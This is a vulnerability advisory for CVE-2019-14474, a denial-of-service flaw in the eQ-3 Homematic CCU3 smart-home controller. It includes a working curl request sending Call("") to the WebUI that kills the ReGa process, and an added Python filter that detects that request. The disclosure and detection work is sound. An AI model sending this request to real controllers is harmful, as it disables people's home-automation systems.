CVE-2019-14474 eQ-3 Homematic CCU3 has Improper Input Validation in function 'Call()' of ReGa core logic process, resulting in the ability to start a Denial of Service. Due to Improper Authorization an attacker can obtain a session ID from CVE-2019-9583 or a valid guest/user/admin account can start this attack too

Overview

  • CVE: CVE-2019-14474
  • Author: psytester
  • Title: eQ-3 Homematic CCU3 has Improper Input Validation in function ‘Call()’ of ReGa core logic process, resulting in the ability to start a Denial of Service. Due to Improper Authorization an attacker can obtain a session ID from CVE-2019-9583 or a valid guest/user/admin account can start this attack too
  • Vulnerability Type: CWE-20: Improper Input Validation
  • CVSSv3 Base Score: 7.5
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Publishing Date: 03.08.2019
  • Updated: –
  • Vendor: eQ-3 AG
  • Product: Homematic CCU3
  • Vendor contacted: 08.05.2019
  • Vendor confirmation: N.A.
  • Vendor patch: N.A.
  • Vendor Reference: N.A.
  • Affected Firmware version of CCU3: 3.41.11, 3.43.16, 3.45.5, 3.45.7, 3.47.10, 3.47.15 tested

Background

From vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[…]

Past eQ-3 press release about taking security updates seriously (translated from German):
[…]
It is important to eQ-3 that even those vulnerabilities are closed that are irrelevant for most installations.
[…]
Although only users who disregard eQ-3's security advisories or have not installed security updates for several years are affected, eQ-3 gives such cases high priority and fixes the corresponding vulnerabilities in new software versions and hotfixes as quickly as possible after they become known.
[…]

Issue Description

While analyzing the CCU web interface, using the page objects it serves and the underlying WebUI calls visible in the browser developer console, an Improper Input Validation vulnerability was identified. It can be exploited to cause a Denial of Service of the ReGa core logic process. Unauthenticated attackers with access to the web interface can exploit it by first obtaining a SessionID via CVE-2019-9583; authenticated users can exploit it as well.

First, obtain a SessionID from any page identified in CVE-2019-9583, or log in as a valid user.

On the shell console, check the PID of the ReGa process:

# ps -afe | grep ReGa
20956 root      0:00 /bin/ReGaHss.normal -f /etc/rega.conf -l 2
20998 root      0:00 grep ReGa

Send this POST request containing Call("") (that is, double quotation marks with no content) together with your SessionID:
curl -X POST -i 'http://1.2.3.4/esp/exec.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[Call("")]]></prototypejs>'

This results in an HTTP 500 Internal Server Error.

On the shell console you can verify that the ReGa process has died and the CCU no longer works:

# ps -afe | grep ReGa
21019 root      0:00 grep ReGa
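
As an added example (not part of the original advisory and not eQ-3 code), the following Python check shows how a reverse proxy or request-logging layer in front of the WebUI could flag the request described above. It matches only the empty-string Call("") input this advisory documents; the function name inspect_request and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Endpoint from the advisory's request. Lower-casing the path before the
# comparison is a conservative assumption about the CCU web server.
EXEC_PATH = "/esp/exec.htm"
# Call("") with optional whitespace, i.e. an empty double-quoted argument.
EMPTY_CALL = re.compile(r'\bCall\s*\(\s*""\s*\)')
# Script bodies are posted wrapped in <prototypejs><![CDATA[ ... ]]>.
CDATA = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.DOTALL)


def inspect_request(method, url, body):
    """Return 'block' for the request shape described in the advisory, else 'pass'."""
    if method.upper() != "POST":
        return "pass"
    if urlsplit(url).path.lower() != EXEC_PATH:
        return "pass"
    # Inspect every CDATA section; fall back to the raw body if none is found.
    scripts = CDATA.findall(body) or [body]
    return "block" if any(EMPTY_CALL.search(s) for s in scripts) else "pass"


# Constructed sample requests. The first mirrors the advisory's curl command;
# "someMethod" is a hypothetical placeholder, not a documented ReGa method.
SAMPLES = [
    ("POST", "http://1.2.3.4/esp/exec.htm?sid=@JLS011UTXB@",
     '<prototypejs><![CDATA[Call("")]]></prototypejs>'),
    ("POST", "/esp/exec.htm?sid=@JLS011UTXB@",
     '<prototypejs><![CDATA[Call( "" )]]></prototypejs>'),
    ("POST", "/esp/exec.htm?sid=@JLS011UTXB@",
     '<prototypejs><![CDATA[Call("someMethod")]]></prototypejs>'),
    ("GET", "/esp/exec.htm?sid=@JLS011UTXB@", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(inspect_request(method, url, body), method, url)
```

Because no vendor patch is listed, a filter like this only covers the single input documented here and does not replace restricting network access to the WebUI.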

CVE

CVE-2019-14474

CVSSv3 Base Score

CVSSv3 Base Score: 7.5

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Credit

psytester

Don't own an original CCU2 or CCU3, but want to analyze the CCU ‘for free’?
You can download:
  • piVCCU, for running the original CCU3 firmware in an LXC container on a Raspberry Pi
  • RaspberryMatic, for running the open-source OCCU-based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 1, 2019 | Last modified on August 3, 2019